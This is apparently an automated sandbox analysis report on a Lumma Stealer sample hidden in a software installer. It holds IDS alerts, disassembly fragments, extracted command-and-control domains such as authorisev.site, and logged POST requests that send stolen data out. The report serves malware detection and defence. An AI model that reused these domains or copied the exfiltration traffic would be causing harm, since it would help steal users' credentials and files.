          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4x nop then add ebp, dword ptr [esp+0Ch]36_2_0042E870
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4x nop then movzx ecx, byte ptr [edi+ebx]36_2_00405820
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4x nop then mov word ptr [eax], cx36_2_0041C8CE
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4x nop then mov ecx, eax36_2_0040E8D6
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4x nop then movzx ebx, byte ptr [edx+esi]36_2_0040C960
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4x nop then mov ecx, eax36_2_0040E996
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4x nop then jmp eax36_2_0042AA40
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4x nop then movzx ecx, byte ptr [esp+eax+1817620Ch]36_2_0042AA60
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4x nop then mov word ptr [eax], cx36_2_0042CA72
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4x nop then mov word ptr [eax], cx36_2_0042CA72
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4x nop then movzx ecx, byte ptr [esp+eax+2BB126CDh]36_2_0043FAD0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4x nop then mov edi, edx36_2_00421B40
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4x nop then cmp al, 2Eh36_2_0042AC04
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4x nop then mov edi, esi36_2_0041ECDE
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4x nop then movzx ebx, byte ptr [edx]36_2_00437CA0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4x nop then mov ebx, dword ptr [edi+04h]36_2_0042DE70
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4x nop then mov dword ptr [esp+3Ch], 595A5B84h36_2_00440E3A
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4x nop then mov edi, dword ptr [esp+54h]36_2_0042CEDA
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4x nop then jmp edx36_2_00442EB0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4x nop then xor byte ptr [ecx+ebx], bl36_2_00442EB0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4x nop then cmp word ptr [ebp+edi+02h], 0000h36_2_00425F00
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4x nop then movzx edi, word ptr [edx]36_2_00428F00

          Networking

          barindex
          Source: Network trafficSuricata IDS: 2057071 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (authorisev .site) : 192.168.2.4:51868 -> 1.1.1.1:53
          Source: Network trafficSuricata IDS: 2057072 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (authorisev .site in TLS SNI) : 192.168.2.4:49743 -> 104.21.85.194:443
          Source: Network trafficSuricata IDS: 2057072 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (authorisev .site in TLS SNI) : 192.168.2.4:49755 -> 104.21.85.194:443
          Source: Network trafficSuricata IDS: 2057072 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (authorisev .site in TLS SNI) : 192.168.2.4:49777 -> 104.21.85.194:443
          Source: Network trafficSuricata IDS: 2057072 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (authorisev .site in TLS SNI) : 192.168.2.4:49749 -> 104.21.85.194:443
          Source: Network trafficSuricata IDS: 2057072 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (authorisev .site in TLS SNI) : 192.168.2.4:49741 -> 104.21.85.194:443
          Source: Network trafficSuricata IDS: 2057072 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (authorisev .site in TLS SNI) : 192.168.2.4:49766 -> 104.21.85.194:443
          Source: Network trafficSuricata IDS: 2057072 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (authorisev .site in TLS SNI) : 192.168.2.4:49739 -> 104.21.85.194:443
          Source: Network trafficSuricata IDS: 2057072 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (authorisev .site in TLS SNI) : 192.168.2.4:49793 -> 104.21.85.194:443
          Source: Network trafficSuricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.4:49766 -> 104.21.85.194:443
          Source: Network trafficSuricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.4:49741 -> 104.21.85.194:443
          Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49741 -> 104.21.85.194:443
          Source: Network trafficSuricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.4:49739 -> 104.21.85.194:443
          Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49739 -> 104.21.85.194:443
          Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49793 -> 104.21.85.194:443
          Source: Network trafficSuricata IDS: 2843864 - Severity 1 - ETPRO MALWARE Suspicious Zipped Filename in Outbound POST Request (screen.) M2 : 192.168.2.4:49777 -> 104.21.85.194:443
          Source: Malware configuration extractorURLs: goalyfeastz.site
          Source: Malware configuration extractorURLs: dilemmadu.site
          Source: Malware configuration extractorURLs: seallysl.site
          Source: Malware configuration extractorURLs: authorisev.site
          Source: Malware configuration extractorURLs: contemteny.site
          Source: Malware configuration extractorURLs: faulteyotk.site
          Source: Malware configuration extractorURLs: opposezmny.site
          Source: Malware configuration extractorURLs: servicedny.site
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping -n 5 127.0.0.1
          Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
          Source: Joe Sandbox ViewJA3 fingerprint: 28a2c9bd18a11de089ef85a160da29e4
          Source: Joe Sandbox ViewJA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
          Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49743 -> 104.21.85.194:443
          Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49755 -> 104.21.85.194:443
          Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49777 -> 104.21.85.194:443
          Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49766 -> 104.21.85.194:443
          Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49749 -> 104.21.85.194:443
          Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49741 -> 104.21.85.194:443
          Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49739 -> 104.21.85.194:443
          Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49793 -> 104.21.85.194:443
          Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: authorisev.site
          Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedCookie: __cf_mw_byp=6dV0eNX_lBbnb2hOAl2v78FYI7Qpdk4E83U3y_mHFl4-1730454656-0.0.1.1-/apiUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 42Host: authorisev.site
          Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=be85de5ipdocierre1Cookie: __cf_mw_byp=6dV0eNX_lBbnb2hOAl2v78FYI7Qpdk4E83U3y_mHFl4-1730454656-0.0.1.1-/apiUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 18158Host: authorisev.site
          Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=be85de5ipdocierre1Cookie: __cf_mw_byp=6dV0eNX_lBbnb2hOAl2v78FYI7Qpdk4E83U3y_mHFl4-1730454656-0.0.1.1-/apiUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8779Host: authorisev.site
          Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=be85de5ipdocierre1Cookie: __cf_mw_byp=6dV0eNX_lBbnb2hOAl2v78FYI7Qpdk4E83U3y_mHFl4-1730454656-0.0.1.1-/apiUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 20432Host: authorisev.site
          Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=be85de5ipdocierre1Cookie: __cf_mw_byp=6dV0eNX_lBbnb2hOAl2v78FYI7Qpdk4E83U3y_mHFl4-1730454656-0.0.1.1-/apiUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 1233Host: authorisev.site
          Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=be85de5ipdocierre1Cookie: __cf_mw_byp=6dV0eNX_lBbnb2hOAl2v78FYI7Qpdk4E83U3y_mHFl4-1730454656-0.0.1.1-/apiUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 563570Host: authorisev.site
          Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedCookie: __cf_mw_byp=6dV0eNX_lBbnb2hOAl2v78FYI7Qpdk4E83U3y_mHFl4-1730454656-0.0.1.1-/apiUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 77Host: authorisev.site
          Source: unknownTCP traffic detected without corresponding DNS query: 95.101.111.144
          Source: unknownTCP traffic detected without corresponding DNS query: 95.101.111.137
          Source: unknownTCP traffic detected without corresponding DNS query: 95.101.111.168
          Source: unknownTCP traffic detected without corresponding DNS query: 95.101.111.144
          Source: unknownTCP traffic detected without corresponding DNS query: 95.101.111.137
          Source: unknownTCP traffic detected without corresponding DNS query: 95.101.111.168
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: C:\Users\user\AppData\Local\hangbird\Updater.exeCode function: 35_2_00B9D935 InternetReadFile,SetEvent,GetLastError,SetEvent,35_2_00B9D935
          Source: global trafficDNS traffic detected: DNS query: authorisev.site
          Source: unknownHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: authorisev.site
          Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Fri, 01 Nov 2024 09:50:56 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeX-Frame-Options: SAMEORIGINReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=IjjQOQjUQOVK4cOVh2WZh0ToapHd4SyCVl2Tn8KkiQQ96CptCjAlAN7gf5OYvVe4t8qwZbXNwBrVj6rzo5QibK4DyKcXEonuXjIKHOINsGdQT9Ymj2SzkCECE%2F41MpMHtSg%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8dbafbc149e26c1c-DFW
          Source: file.exe, is-EUGF2.tmp.3.dr, is-5MQFH.tmp.3.dr, is-E0D1D.tmp.3.drString found in binary or memory: http://aia.entrust.net/ts1-chain256.cer01
          Source: file.exe, is-EUGF2.tmp.3.dr, is-5MQFH.tmp.3.dr, is-E0D1D.tmp.3.drString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crt0
          Source: file.exe, is-EUGF2.tmp.3.dr, is-5MQFH.tmp.3.dr, is-E0D1D.tmp.3.drString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
          Source: file.exeString found in binary or memory: http://ccsca2021.crl.certum.pl/ccsca2021.crl0s
          Source: file.exeString found in binary or memory: http://ccsca2021.ocsp-certum.com05
          Source: file.tmp, 00000001.00000003.1680291357.0000000003B70000.00000004.00001000.00020000.00000000.sdmp, file.tmp, 00000001.00000003.1682791691.0000000002B80000.00000004.00001000.00020000.00000000.sdmp, file.tmp, 00000003.00000003.1716658653.0000000002490000.00000004.00001000.00020000.00000000.sdmp, _isdecmp.dll.1.dr, _isdecmp.dll.3.drString found in binary or memory: http://crl.certum.pl/cscasha2.crl0q
          Source: file.tmp, 00000001.00000003.1680291357.0000000003B70000.00000004.00001000.00020000.00000000.sdmp, file.tmp, 00000001.00000003.1682791691.0000000002B80000.00000004.00001000.00020000.00000000.sdmp, file.tmp, 00000003.00000003.1716658653.0000000002490000.00000004.00001000.00020000.00000000.sdmp, file.exe, _isdecmp.dll.1.dr, _isdecmp.dll.3.drString found in binary or memory: http://crl.certum.pl/ctnca.crl0k
          Source: file.exeString found in binary or memory: http://crl.certum.pl/ctnca2.crl0l
          Source: file.exeString found in binary or memory: http://crl.certum.pl/ctsca2021.crl0o
          Source: file.exe, is-EUGF2.tmp.3.dr, is-5MQFH.tmp.3.dr, is-E0D1D.tmp.3.drString found in binary or memory: http://crl.entrust.net/2048ca.crl0
          Source: file.exe, is-EUGF2.tmp.3.dr, is-5MQFH.tmp.3.dr, is-E0D1D.tmp.3.drString found in binary or memory: http://crl.entrust.net/ts1ca.crl0
          Source: is-7LJOT.tmp.3.drString found in binary or memory: http://crl.globalsign.com/gs/gstimestampingsha2g2.crl0
          Source: is-7LJOT.tmp.3.drString found in binary or memory: http://crl.globalsign.com/gscodesignsha2g3.crl0
          Source: is-7LJOT.tmp.3.drString found in binary or memory: http://crl.globalsign.com/root-r3.crl0c
          Source: is-7LJOT.tmp.3.drString found in binary or memory: http://crl.globalsign.net/root-r3.crl0
          Source: file.tmp, 00000001.00000003.1680291357.0000000003B70000.00000004.00001000.00020000.00000000.sdmp, file.tmp, 00000001.00000003.1682791691.0000000002B80000.00000004.00001000.00020000.00000000.sdmp, file.tmp, 00000003.00000003.1716658653.0000000002490000.00000004.00001000.00020000.00000000.sdmp, _isdecmp.dll.1.dr, _isdecmp.dll.3.drString found in binary or memory: http://crl.sectigo.com/SectigoRSATimeStampingCA.crl0t
          Source: file.exe, is-EUGF2.tmp.3.dr, is-5MQFH.tmp.3.dr, is-E0D1D.tmp.3.drString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0S
          Source: file.exe, is-EUGF2.tmp.3.dr, is-5MQFH.tmp.3.dr, is-E0D1D.tmp.3.drString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
          Source: file.exe, is-EUGF2.tmp.3.dr, is-5MQFH.tmp.3.dr, is-E0D1D.tmp.3.drString found in binary or memory: http://crl4.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0
          Source: file.tmp, 00000001.00000003.1680291357.0000000003B70000.00000004.00001000.00020000.00000000.sdmp, file.tmp, 00000001.00000003.1682791691.0000000002B80000.00000004.00001000.00020000.00000000.sdmp, file.tmp, 00000003.00000003.1716658653.0000000002490000.00000004.00001000.00020000.00000000.sdmp, _isdecmp.dll.1.dr, _isdecmp.dll.3.drString found in binary or memory: http://crt.sectigo.com/SectigoRSATimeStampingCA.crt0#
          Source: file.tmp, 00000001.00000003.1682791691.0000000002B80000.00000004.00001000.00020000.00000000.sdmp, file.tmp, 00000003.00000003.1716658653.0000000002490000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://cscasha2.ocsp-ce
          Source: file.tmp, 00000001.00000003.1680291357.0000000003B70000.00000004.00001000.00020000.00000000.sdmp, file.tmp, 00000001.00000003.1682791691.0000000002B80000.00000004.00001000.00020000.00000000.sdmp, file.tmp, 00000003.00000003.1716658653.0000000002490000.00000004.00001000.00020000.00000000.sdmp, _isdecmp.dll.1.dr, _isdecmp.dll.3.drString found in binary or memory: http://cscasha2.ocsp-certum.com04
          Source: file.exe, is-EUGF2.tmp.3.dr, is-5MQFH.tmp.3.dr, is-E0D1D.tmp.3.drString found in binary or memory: http://ocsp.digicert.com0
          Source: file.exe, is-EUGF2.tmp.3.dr, is-5MQFH.tmp.3.dr, is-E0D1D.tmp.3.drString found in binary or memory: http://ocsp.digicert.com0A
          Source: file.exe, is-EUGF2.tmp.3.dr, is-5MQFH.tmp.3.dr, is-E0D1D.tmp.3.drString found in binary or memory: http://ocsp.entrust.net02
          Source: file.exe, is-EUGF2.tmp.3.dr, is-5MQFH.tmp.3.dr, is-E0D1D.tmp.3.drString found in binary or memory: http://ocsp.entrust.net03
          Source: file.tmp, 00000001.00000003.1680291357.0000000003B70000.00000004.00001000.00020000.00000000.sdmp, file.tmp, 00000001.00000003.1682791691.0000000002B80000.00000004.00001000.00020000.00000000.sdmp, file.tmp, 00000003.00000003.1716658653.0000000002490000.00000004.00001000.00020000.00000000.sdmp, _isdecmp.dll.1.dr, _isdecmp.dll.3.drString found in binary or memory: http://ocsp.sectigo.com0
          Source: file.tmp, 00000001.00000003.1682791691.0000000002B80000.00000004.00001000.00020000.00000000.sdmp, file.tmp, 00000003.00000003.1716658653.0000000002490000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://ocsp.us
          Source: is-7LJOT.tmp.3.drString found in binary or memory: http://ocsp2.globalsign.com/gscodesignsha2g30V
          Source: is-7LJOT.tmp.3.drString found in binary or memory: http://ocsp2.globalsign.com/gstimestampingsha2g20
          Source: is-7LJOT.tmp.3.drString found in binary or memory: http://ocsp2.globalsign.com/rootr306
          Source: file.tmp, 00000001.00000003.1682791691.0000000002B80000.00000004.00001000.00020000.00000000.sdmp, file.tmp, 00000003.00000003.1716658653.0000000002490000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://repository.certum
          Source: file.exeString found in binary or memory: http://repository.certum.pl/ccsca2021.cer0
          Source: file.tmp, 00000001.00000003.1680291357.0000000003B70000.00000004.00001000.00020000.00000000.sdmp, file.tmp, 00000001.00000003.1682791691.0000000002B80000.00000004.00001000.00020000.00000000.sdmp, file.tmp, 00000003.00000003.1716658653.0000000002490000.00000004.00001000.00020000.00000000.sdmp, _isdecmp.dll.1.dr, _isdecmp.dll.3.drString found in binary or memory: http://repository.certum.pl/cscasha2.cer0
          Source: file.tmp, 00000001.00000003.1680291357.0000000003B70000.00000004.00001000.00020000.00000000.sdmp, file.tmp, 00000001.00000003.1682791691.0000000002B80000.00000004.00001000.00020000.00000000.sdmp, file.tmp, 00000003.00000003.1716658653.0000000002490000.00000004.00001000.00020000.00000000.sdmp, file.exe, _isdecmp.dll.1.dr, _isdecmp.dll.3.drString found in binary or memory: http://repository.certum.pl/ctnca.cer09
          Source: file.exeString found in binary or memory: http://repository.certum.pl/ctnca2.cer09
          Source: file.exeString found in binary or memory: http://repository.certum.pl/ctsca2021.cer0A
          Source: is-7LJOT.tmp.3.drString found in binary or memory: http://secure.globalsign.com/cacert/gscodesignsha2g3ocsp.crt08
          Source: is-7LJOT.tmp.3.drString found in binary or memory: http://secure.globalsign.com/cacert/gstimestampingsha2g2.crt0
          Source: file.tmp, 00000001.00000003.1680291357.0000000003B70000.00000004.00001000.00020000.00000000.sdmp, file.tmp, 00000001.00000003.1682791691.0000000002B80000.00000004.00001000.00020000.00000000.sdmp, file.tmp, 00000003.00000003.1716658653.0000000002490000.00000004.00001000.00020000.00000000.sdmp, file.exe, _isdecmp.dll.1.dr, _isdecmp.dll.3.drString found in binary or memory: http://subca.ocsp-certum.com01
          Source: file.exeString found in binary or memory: http://subca.ocsp-certum.com02
          Source: file.exeString found in binary or memory: http://subca.ocsp-certum.com05
          Source: file.exeString found in binary or memory: http://vovsoft.com
          Source: file.exeString found in binary or memory: http://vovsoft.com/
          Source: file.exeString found in binary or memory: http://vovsoft.com/blog/how-to-activate-using-license-key/openU
          Source: file.exeString found in binary or memory: http://vovsoft.com/blog/how-to-uninstall-vovsoft-software/openU
          Source: file.exeString found in binary or memory: http://vovsoft.com/help/
          Source: file.exeString found in binary or memory: http://vovsoft.com/openU
          Source: file.exeString found in binary or memory: http://vovsoft.comopenS
          Source: file.exeString found in binary or memory: http://vovsoft.comopenU
          Source: Updater.exe, 0000001C.00000000.1715511029.0000000000BF5000.00000002.00000001.01000000.0000000B.sdmp, Updater.exe, 00000023.00000002.2227476052.0000000000BF5000.00000002.00000001.01000000.0000000B.sdmp, is-7LJOT.tmp.3.drString found in binary or memory: http://www.autoitscript.com/autoit3/X
          Source: file.tmp, 00000001.00000003.1680291357.0000000003B70000.00000004.00001000.00020000.00000000.sdmp, file.tmp, 00000001.00000003.1682791691.0000000002B80000.00000004.00001000.00020000.00000000.sdmp, file.tmp, 00000003.00000003.1716658653.0000000002490000.00000004.00001000.00020000.00000000.sdmp, file.exe, _isdecmp.dll.1.dr, _isdecmp.dll.3.drString found in binary or memory: http://www.certum.pl/CPS0
          Source: file.exe, is-EUGF2.tmp.3.dr, is-5MQFH.tmp.3.dr, is-E0D1D.tmp.3.drString found in binary or memory: http://www.digicert.com/CPS0
          Source: file.exe, is-EUGF2.tmp.3.dr, is-5MQFH.tmp.3.dr, is-E0D1D.tmp.3.drString found in binary or memory: http://www.entrust.net/rpa03
          Source: file.exeString found in binary or memory: http://www.indyproject.org/
          Source: MSBuild.exe, 00000024.00000002.2348303261.0000000001271000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://authorisev.site/
          Source: MSBuild.exe, 00000024.00000002.2348303261.00000000012F2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://authorisev.site//
          Source: MSBuild.exe, 00000024.00000002.2348303261.00000000012DE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://authorisev.site/0
          Source: MSBuild.exe, 00000024.00000002.2348303261.0000000001271000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://authorisev.site/2U
          Source: MSBuild.exe, 00000024.00000002.2348303261.00000000012CF000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000024.00000002.2348303261.0000000001271000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://authorisev.site/api
          Source: MSBuild.exe, 00000024.00000002.2348303261.00000000012F2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://authorisev.site/mOW
          Source: MSBuild.exe, 00000024.00000002.2348303261.0000000001271000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000024.00000002.2348303261.00000000012F2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://authorisev.site/pi
          Source: MSBuild.exe, 00000024.00000002.2348303261.000000000124D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://authorisev.site:443/api
          Source: file.tmp, 00000001.00000003.1680291357.0000000003B70000.00000004.00001000.00020000.00000000.sdmp, file.tmp, 00000001.00000003.1682791691.0000000002B80000.00000004.00001000.00020000.00000000.sdmp, file.tmp, 00000003.00000003.1716658653.0000000002490000.00000004.00001000.00020000.00000000.sdmp, _isdecmp.dll.1.dr, _isdecmp.dll.3.drString found in binary or memory: https://jrsoftware.org/
          Source: file.exeString found in binary or memory: https://jrsoftware.org/ishelp/index.php?topic=setupcmdlineSetupU
          Source: file.tmp, 00000001.00000003.1680291357.0000000003B70000.00000004.00001000.00020000.00000000.sdmp, file.tmp, 00000001.00000003.1682791691.0000000002B80000.00000004.00001000.00020000.00000000.sdmp, file.tmp, 00000003.00000003.1716658653.0000000002490000.00000004.00001000.00020000.00000000.sdmp, _isdecmp.dll.1.dr, _isdecmp.dll.3.drString found in binary or memory: https://jrsoftware.org0
          Source: file.tmp, 00000001.00000003.1680291357.0000000003B70000.00000004.00001000.00020000.00000000.sdmp, file.tmp, 00000001.00000003.1682791691.0000000002B80000.00000004.00001000.00020000.00000000.sdmp, file.tmp, 00000003.00000003.1716658653.0000000002490000.00000004.00001000.00020000.00000000.sdmp, _isdecmp.dll.1.dr, _isdecmp.dll.3.drString found in binary or memory: https://sectigo.com/CPS0D
          Source: file.exeString found in binary or memory: https://vovsoft.com/blog/credits-and-acknowledgements/open
          Source: file.exeString found in binary or memory: https://vovsoft.com/translation/
          Source: file.exeString found in binary or memory: https://vovsoft.com/translation/openU
          Source: is-7LJOT.tmp.3.drString found in binary or memory: https://www.autoitscript.com/autoit3/
          Source: file.tmp, 00000001.00000003.1680291357.0000000003B70000.00000004.00001000.00020000.00000000.sdmp, file.tmp, 00000001.00000003.1682791691.0000000002B80000.00000004.00001000.00020000.00000000.sdmp, file.tmp, 00000003.00000003.1716658653.0000000002490000.00000004.00001000.00020000.00000000.sdmp, file.exe, _isdecmp.dll.1.dr, _isdecmp.dll.3.drString found in binary or memory: https://www.certum.pl/CPS0
          Source: file.exe, is-EUGF2.tmp.3.dr, is-5MQFH.tmp.3.dr, is-E0D1D.tmp.3.drString found in binary or memory: https://www.entrust.net/rpa0
          Source: is-7LJOT.tmp.3.drString found in binary or memory: https://www.globalsign.com/repository/0
          Source: is-7LJOT.tmp.3.drString found in binary or memory: https://www.globalsign.com/repository/06
          Source: file.exe, 00000000.00000003.1677553862.000000007F86B000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000003.1676905528.0000000003260000.00000004.00001000.00020000.00000000.sdmp, file.tmp, 00000001.00000000.1678965208.0000000000E91000.00000020.00000001.01000000.00000004.sdmp, file.tmp, 00000003.00000000.1685727842.000000000029D000.00000020.00000001.01000000.00000009.sdmp, file.tmp.0.dr, file.tmp.2.drString found in binary or memory: https://www.innosetup.com/
          Source: file.exe, 00000000.00000003.1677553862.000000007F86B000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000003.1676905528.0000000003260000.00000004.00001000.00020000.00000000.sdmp, file.tmp, 00000001.00000000.1678965208.0000000000E91000.00000020.00000001.01000000.00000004.sdmp, file.tmp, 00000003.00000000.1685727842.000000000029D000.00000020.00000001.01000000.00000009.sdmp, file.tmp.0.dr, file.tmp.2.drString found in binary or memory: https://www.remobjects.com/ps
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49744
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49743
          Source: unknownNetwork traffic detected: HTTP traffic on port 49817 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49742
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49741
          Source: unknownNetwork traffic detected: HTTP traffic on port 49789 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49800 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49766 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49743 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49746 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49781 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49769 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49803 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49795 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49826 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49739
          Source: unknownNetwork traffic detected: HTTP traffic on port 49772 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49820 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49812 -> 443
